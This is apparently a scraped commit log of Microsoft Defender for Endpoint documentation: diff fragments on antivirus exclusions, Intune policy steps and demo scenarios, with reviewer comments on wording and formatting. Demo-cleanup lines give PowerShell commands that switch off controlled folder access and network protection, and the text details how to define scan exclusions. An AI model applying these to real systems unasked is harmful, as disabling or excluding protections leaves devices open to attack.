-You can exclude files that are opened by specific processes from Microsoft Defender Antivirus scans. See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) before defining your exclusion lists.
+You can exclude files that are opened by specific processes from Microsoft Defender Antivirus scans. Note that these types of exclusions are for files that are opened by processes and not the processes themselves. To exclude a process, add a file exclusion (see [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)).
+
+See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md) before defining your exclusion lists.
This article describes how to configure exclusion lists.
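Review bot: In the rewritten intro, the link text `Configure and validate exclusions based on file extension and folder location` doesn't match the target article's title as used elsewhere in this change set (`...based on file name, extension, and folder location`); pick one form. The guidance `To exclude a process, add a file exclusion` is a useful clarification, but it would help to say that the file exclusion should point at the process's executable, since the sentence otherwise gives no hint which file to exclude. The unchanged `Last updated 04/14/2023` line below the front matter now disagrees with the `Last updated : 07/18/2023` value above it.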
For more information on how to use PowerShell with Microsoft Defender Antivirus,
- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)+
security Configure Protection Features Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-protection-features-microsoft-defender-antivirus.md
See [Use next-gen Microsoft Defender Antivirus technologies through cloud protec
## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Configure Proxy Internet https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-proxy-internet.md
However, if the connectivity check results indicate a failure, an HTTP error is
- [Onboard Windows devices](configure-endpoints.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md) - [Onboard devices without Internet access to Microsoft Defender for Endpoint](onboard-offline-machines.md)
security Configure Real Time Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-real-time-protection-microsoft-defender-antivirus.md
If you're looking for antivirus-related information for other platforms, see:
- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Remediation Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-remediation-microsoft-defender-antivirus.md
Also see [Configure remediation-required scheduled full Microsoft Defender Antiv
- [Configure end-user Microsoft Defender Antivirus interaction](configure-end-user-interaction-microsoft-defender-antivirus.md) - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Configure Server Endpoints https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-server-endpoints.md
For other Windows server versions, you have two options to offboard Windows serv
- [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md) - [Azure Active Directory Seamless single sign-on](/azure/active-directory/hybrid/how-to-connect-sso-quick-start) - [Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/troubleshoot-security-config-mgt#instructions-for-applying-computer-join-rule-in-aad-connect)
security Configure Server Exclusions Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus.md
Title: Configure Microsoft Defender Antivirus exclusions on Windows Server
+ Title: Microsoft Defender Antivirus exclusions on Windows Server
description: Windows Server includes automatic exclusions, based on server role. You can also add custom exclusions. ms.localizationpriority: medium Previously updated : 07/13/2023 Last updated : 07/18/2023
search.appverid: met150
-# Configure Microsoft Defender Antivirus exclusions on Windows Server
+# Microsoft Defender Antivirus exclusions on Windows Server
**Applies to:**
search.appverid: met150
- Windows
-This article describes exclusions for Windows Server. Because Microsoft Defender Antivirus is built into Windows, [built-in exclusions](#built-in-exclusions) for operating system files happen automatically on all versions of Windows. On Windows Server 2016 and later, [automatic exclusions](#automatic-server-role-exclusions) happen automatically as roles are added. If necessary, you can define custom exclusions or opt out of automatic exclusions.
+This article describes types of exclusions that you don't have to define for Microsoft Defender Antivirus:
+
+- [Built-in exclusions](#built-in-exclusions) for operating system files on all versions of Windows.
+- [Automatic exclusions](#automatic-server-role-exclusions) for roles on Windows Server 2016 and later.
For a more detailed overview of exclusions, see [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
Built-in exclusions include:
## Opting out of automatic exclusions
-In Windows Server 2016 and later, the predefined exclusions delivered by [Security intelligence updates](microsoft-defender-antivirus-updates.md#security-intelligence-updates) only exclude the default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually control the set of exclusions, make sure to opt out of the automatic exclusions delivered in Security intelligence updates. But keep in mind that the exclusions that are delivered automatically are optimized for Windows Server 2016 and later. See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) before defining your exclusion lists.
+In Windows Server 2016 and later, the predefined exclusions delivered by [Security intelligence updates](microsoft-defender-antivirus-updates.md#security-intelligence-updates) only exclude the default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually control the set of exclusions, make sure to opt out of the automatic exclusions delivered in Security intelligence updates. But keep in mind that the exclusions that are delivered automatically are optimized for Windows Server 2016 and later. See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) before defining your exclusion lists.
> [!WARNING] > Opting out of automatic exclusions might adversely impact performance, or result in data corruption. Automatic server role exclusions are optimized for Windows Server 2016, Windows Server 2019, and Windows Server 2022.
For more information and allowed parameters, see:
If necessary, you can add or remove custom exclusions. To do that, see the following articles:
+- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md)
- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md) - [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
+ ## See also
- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)-- [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md) - [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
+- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
+- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
+- [Configure Defender for Endpoint on Android features](android-configure.md)
+- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+
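Review bot: The added heading on the `+ ## See also` line carries a leading space before `##`, which the other headings in this hunk do not have; drop it so the line reads `## See also` and matches the heading style used elsewhere. Separately, in the surrounding context the lead-in "For more information and allowed parameters, see:" is immediately followed by a second lead-in ("If necessary, you can add or remove custom exclusions. To do that, see the following articles:") with no list between them, so the first lead-in dangles; either remove it or restore the list it was introducing.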
security Configure Siem https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-siem.md
For more information, see:
- [Hello World example (describes how to register an application in Azure Active Directory)](api-hello-world.md) - [Get access with application context](exposed-apis-create-app-webapp.md) - [Microsoft 365 Defender SIEM integration](../defender/configure-siem-defender.md)
security Configure Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-updates.md
For more information on the parameters and how to configure them, see [Set-MpPre
> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Vulnerability Email Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-vulnerability-email-notifications.md
This section lists various issues that you may encounter when using email notifi
- [Security recommendations](tvm-security-recommendation.md) - [Weaknesses](tvm-weaknesses.md) - [Event timeline](threat-and-vuln-mgt-event-timeline.md)
security Connected Applications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/connected-applications.md
The Connected applications page provides information about the Azure AD applicat
## Edit, reconfigure, or delete a connected application The **Open application settings** link opens the corresponding Azure AD application management page in the Azure portal. From the Azure portal, you can manage permissions, reconfigure, or delete the connected applications.
security Contact Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/contact-support.md
Learn how to open support tickets by contacting Defender for Endpoint support.
- [Troubleshoot service issues](troubleshoot-mdatp.md) - [Check service health](/microsoft-365/enterprise/view-service-health)
security Controlled Folders https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/controlled-folders.md
You can use the Windows Security app to view the list of folders that are protec
> [!NOTE] > [Windows system folders](#windows-system-folders-are-protected-by-default) are protected by default, and you cannot remove them from the list. Subfolders are also included in protection when you add a new folder to the list.
security Corelight Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/corelight-integration.md
To enable the Corelight integration, you'll need to take the following steps:
## See also - [Device discovery FAQ](device-discovery-faq.md)
security Create Alert By Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/create-alert-by-reference.md
POST https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference
"category": "Exploit" } ```
security Customize Controlled Folders https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-controlled-folders.md
For more information about customizing the notification when a rule is triggered
- [Protect important folders with controlled folder access](controlled-folders.md) - [Enable controlled folder access](enable-controlled-folders.md) - [Enable attack surface reduction rules](enable-attack-surface-reduction.md)
security Customize Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-exploit-protection.md
For more information about customizing the notification when a rule is triggered
- [Evaluate exploit protection](evaluate-exploit-protection.md) - [Enable exploit protection](enable-exploit-protection.md) - [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security Customize Run Review Remediate Scans Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/customize-run-review-remediate-scans-microsoft-defender-antivirus.md
Topic | Description
[Configure remediation for scans](configure-remediation-microsoft-defender-antivirus.md) | Configure what Microsoft Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder [Configure scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) | Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans [Configure and run scans](run-scan-microsoft-defender-antivirus.md) | Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app
-[Review scan results](review-scan-results-microsoft-defender-antivirus.md) | Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app
+[Review scan results](review-scan-results-microsoft-defender-antivirus.md) | Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app
security Data Collection Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/data-collection-analyzer.md
The analyzer and all the above scenario flags can be initiated remotely by runni
> - **-m** \# - The number of minutes to run (5 minutes in the above example) > > - When using MDEClientAnalyzer.cmd the script checks for privileges using "net session" which requires the service "Server" to be running. If it is not, you will get the error message _Script is running with insufficient privileges_. Run it with administrator privileges if ECHO is off.
security Data Storage Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/data-storage-privacy.md
By providing customers with compliant, independently verified services, Microsof
For more information on the Defender for Endpoint certification reports, see [Microsoft Trust Center](https://servicetrust.microsoft.com/). > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-datastorage-belowfoldlink)
security Defender Compatibility https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-compatibility.md
Microsoft Defender Antivirus will continue to receive updates, and the *msmpeng.
The Microsoft Defender Antivirus interface will be disabled. Users on the device won't be able to use Microsoft Defender Antivirus to perform on-demand scans or configure most options. For more information, see the [Microsoft Defender Antivirus and Defender for Endpoint compatibility topic](microsoft-defender-antivirus-compatibility.md).
security Defender Endpoint Antivirus Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-antivirus-exclusions.md
Previously updated : 07/13/2023 Last updated : 07/18/2023
You can take certain actions to prevent false positives and similar issues from
This article explains how these actions work, and describes the various types of exclusions that can be defined for Defender for Endpoint and Microsoft Defender Antivirus. > [!CAUTION]
-> **Defining exclusions reduces the level of protection offered by Defender for Endpoint and Microsoft Defender Antivirus**. Use exclusions as a last resort, and make sure to define only the exclusions that are necessary. Make sure to review your exclusions periodically, and remove the ones you no longer need. See [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) and [Common mistakes to avoid](common-exclusion-mistakes-microsoft-defender-antivirus.md).
+> **Defining exclusions reduces the level of protection offered by Defender for Endpoint and Microsoft Defender Antivirus**. Use exclusions as a last resort, and make sure to define only the exclusions that are necessary. Make sure to review your exclusions periodically, and remove the ones you no longer need. See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and [Common mistakes to avoid](common-exclusion-mistakes-microsoft-defender-antivirus.md).
## Submissions, suppressions, and exclusions
Depending on what you're using, you might need to refer to the documentation for
## See also -- [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions)
+- [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions)
- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md) - [Blog post: The Hitchhiker's Guide to Microsoft Defender for Endpoint exclusions](https://cloudbrothers.info/en/guide-to-defender-exclusions/)+
security Defender Endpoint Demonstration App Reputation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-app-reputation.md
This download is known malware; SmartScreen should block this program from runni
## See also [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Attack Surface Reduction Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-attack-surface-reduction-rules.md
Cleanup c:\demo encryption run the [encrypt/decrypt file](https://demo.wd.micros
[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Block At First Sight Bafs https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-block-at-first-sight-bafs.md
Follow the instructions in [Block at first sight demo](https://demo.wd.microsoft
[Block at First Sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Cloud Delivered Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-cloud-delivered-protection.md
Cloud-delivered protection for Microsoft Defender Antivirus, also referred to as
[Utilize Microsoft cloud-delivered protection in Microsoft Defender Antivirus](/windows/threat-protection/windows-defender-antivirus/utilize-microsoft-cloud-protection-windows-defender-antivirus?ocid=wd-av-demo-cloud-bottom) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Controlled Folder Access Test Tool https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access-test-tool.md
Set-MpPreference -EnableControlledFolderAccess Disabled
## See also [Controlled folder access](/windows/threat-protection/windows-defender-exploit-guard/controlled-folders-exploit-guard)
security Defender Endpoint Demonstration Controlled Folder Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-controlled-folder-access.md
Cleanup c:\demo encryption run the [encrypt/decrypt file](https://demo.wd.micros
## See also [Controlled folder access](/windows/threat-protection/windows-defender-exploit-guard/controlled-folders-exploit-guard?ocid=wd-av-demo-cfa-bottom)
security Defender Endpoint Demonstration Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-exploit-protection.md
Get-ProcessMitigation
[Exploit Protection](/windows/threat-protection/windows-defender-exploit-guard/exploit-protection-exploit-guard?ocid=wd-av-demo-ep-bottom) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-network-protection.md
Set-MpPreference -EnableNetworkProtection Disabled
[Network Protection](network-protection.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Potentially Unwanted Applications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-potentially-unwanted-applications.md
The Potentially Unwanted Applications (PUA) protection feature in Microsoft Defe
[Detect and block Potentially Unwanted Applications](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Smartscreen Url Reputation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-smartscreen-url-reputation.md
A benign page hosting a malicious advertisement
[Microsoft Defender SmartScreen Documentation](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) [Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstrations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstrations.md
The following table lists the available demonstrations alphabetically, with thei
[Endpoint detection and response \(EDR\) overview](overview-endpoint-detection-response.md) [Microsoft Defender for Endpoint security blog](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bg-p/MicrosoftDefenderATPBlog)
security Defender Endpoint False Positives Negatives https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-false-positives-negatives.md
Title: Address false positives/negatives in Microsoft Defender for Endpoint description: Learn how to handle false positives or false negatives in Microsoft Defender for Endpoint.
-keywords: antivirus, exception, exclusion, Microsoft Defender for Endpoint, false positive, false negative, blocked file, blocked url
-ms.sitesec: library
-ms.pagetype: security
ms.localizationpriority: medium Previously updated : 04/06/2023 Last updated : 07/18/2023 audience: ITPro
The procedures in this section describe how to define exclusions and indicators.
In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. Make sure that you define exclusions sparingly, and that you only include the files, folders, processes, and process-opened files that are resulting in false positives. In addition, make sure to review your defined exclusions regularly. We recommend using [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) to define or edit your antivirus exclusions; however, you can use other methods, such as [Group Policy](/azure/active-directory-domain-services/manage-group-policy) (see [Manage Microsoft Defender for Endpoint](manage-mde-post-migration.md). > [!TIP]
-> Need help with antivirus exclusions? See [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md).
+> Need help with antivirus exclusions? See [Configure and validate exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md).
#### Use Intune to manage antivirus exclusions (for existing policies)
-1. In the [Microsoft Intune admin center](https://endpoint.microsoft.com), choose **Endpoint security** \> **Antivirus**, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [the next procedure](#use-intune-to-create-a-new-antivirus-policy-with-exclusions)).
+1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus**, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Use Intune to create a new antivirus policy with exclusions](#use-intune-to-create-a-new-antivirus-policy-with-exclusions).)
2. Choose **Properties**, and next to **Configuration settings**, choose **Edit**. 3. Expand **Microsoft Defender Antivirus Exclusions** and then specify your exclusions.
+ - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
+ - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
+ - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
+ 4. Choose **Review + save**, and then choose **Save**. #### Use Intune to create a new antivirus policy with exclusions
-1. In the [Microsoft Intune admin center](https://endpoint.microsoft.com), choose **Endpoint security** \> **Antivirus** \> **+ Create Policy**.
+1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose **Endpoint security** \> **Antivirus** \> **+ Create Policy**.
-2. Select a platform (such as **Windows 10 and later**, **macOS**, or **Windows 10 and Windows Server**).
+2. Select a platform (such as **Windows 10, Windows 11, and Windows Server**).
3. For **Profile**, select **Microsoft Defender Antivirus exclusions**, and then choose **Create**.
-4. Specify a name and description for the profile, and then choose **Next**.
+4. On the **Create profile** step, specify a name and description for the profile, and then choose **Next**.
5. On the **Configuration settings** tab, specify your antivirus exclusions, and then choose **Next**.
+ - **Excluded Extensions** are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list with a `|` character. For example, `lib|obj`. For more information, see [ExcludedExtensions](/windows/client-management/mdm/policy-csp-defender#excludedextensions).
+ - **Excluded Paths** are exclusions that you define by their location (path). These types of exclusions are also known as file and folder exclusions. Separate each path in the list with a `|` character. For example, `C:\Example|C:\Example1`. For more information, see [ExcludedPaths](/windows/client-management/mdm/policy-csp-defender#excludedpaths).
+ - **Excluded Processes** are exclusions for files that are opened by certain processes. Separate each file type in the list with a `|` character. For example, `C:\Example. exe|C:\Example1.exe`. These exclusions aren't for the actual processes. To exclude processes, you can use file and folder exclusions. For more information, see [ExcludedProcesses](/windows/client-management/mdm/policy-csp-defender#excludedprocesses).
+ 6. On the **Scope tags** tab, if you're using scope tags in your organization, specify scope tags for the policy you're creating. (See [Scope tags](/mem/intune/fundamentals/scope-tags).) 7. On the **Assignments** tab, specify the users and groups to whom your policy should be applied, and then choose **Next**. (If you need help with assignments, see [Assign user and device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign).)
If you've worked through all the steps in this article and still need help, cont
- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) - [Configure Defender for Endpoint on Android features](android-configure.md)+
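Review bot: The two copies of the **Excluded Extensions** bullet diverge: the first (under "Use Intune to manage antivirus exclusions (for existing policies)") reads "Separate each file type in the list must be separated with a `|` character", which is ungrammatical, while the second (under "Use Intune to create a new antivirus policy with exclusions") has the intended "Separate each file type in the list with a `|` character"; align the first with the second. In both **Excluded Processes** bullets the example `C:\Example. exe|C:\Example1.exe` contains a stray space inside the file name and should read `C:\Example.exe|C:\Example1.exe`, and "Separate each file type in the list" there should refer to each process path rather than file type, since the bullet describes process entries. The added `+ 4.` and `+ 6.` steps also carry a leading space that the other numbered steps (`1.`, `2.`) do not, which can render them as indented continuations rather than list items.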
security Defender Endpoint Plan 1 2 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1-2.md
Defender for Endpoint Plan 1 and 2, Defender for Business, and Microsoft 365 Bus
- [Licensing and product terms for Microsoft 365 subscriptions](https://www.microsoft.com/licensing/terms/productoffering/Microsoft365/MCA). - [Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance)
security Defender Endpoint Plan 1 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1.md
See [Microsoft licensing and product terms](https://www.microsoft.com/en-us/lice
- [Get started with Defender for Endpoint Plan 1](mde-plan1-getting-started.md) - [Manage Defender for Endpoint Plan 1](manage-mde-post-migration.md) - [Learn about exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Defender Endpoint Subscription Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-subscription-settings.md
The license usage report is estimated based on sign-in activities on the device.
- [Get started with Microsoft Security (trial offers)](https://www.microsoft.com/security/business/get-started/start-free-trial) - [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) - [Microsoft Defender for Business](../defender-business/mdb-overview.md) (endpoint protection for small and medium-sized businesses)
security Defender Endpoint Trial User Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-trial-user-guide.md
The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the
- [Microsoft Security technical content library](https://www.microsoft.com/security/content-library/Home/Index) - [Defender for Endpoint demonstration](https://cdx.transform.microsoft.com/experience-detail/d5eca65d-13a3-464d-9171-c24cf9dd6050)
security Delete Library https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/delete-library.md
DELETE https://api.securitycenter.microsoft.com/api/libraryfiles/script1.ps1
## Related topic -- [Run live response](run-live-response.md)
+- [Run live response](run-live-response.md)
security Delete Ti Indicator By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/delete-ti-indicator-by-id.md
Here's an example of the request.
```http DELETE https://api.securitycenter.microsoft.com/api/indicators/995 ```
security Deploy And Manage Using Group Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-and-manage-using-group-policy.md
You can download the files here, [Printer Protection Samples](https://github.com
:::image type="content" source="images/create-default.png" alt-text="This is create default screenshot." lightbox="images/create-default.png"::: Combine these two policy rules into [one XML file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Printer%20Protection%20Samples/Group%20Policy/Printer_Policies.xml). See step 4 from the [Deploy using group policy](deploy-and-manage-using-group-policy.md) section to deploy this configuration.
security Deploy And Manage Using Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-and-manage-using-intune.md
You can download the files here, [Printer Protection Samples](https://github.com
:::image type="content" source="media/188243552-5d2a90ab-dba6-450f-ad8f-86a862f6e739.png" alt-text="A screenshot of policy 2." lightbox= "media/188243552-5d2a90ab-dba6-450f-ad8f-86a862f6e739.png"::: Here's the [sample file](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Printer%20Protection%20Samples/Intune%20OMA-URI/Default%20Deny%20-%20custom%20policy.xml). See step 4 from the [Deploy Printer Protection](deploy-and-manage-using-intune.md) section to deploy the configuration.
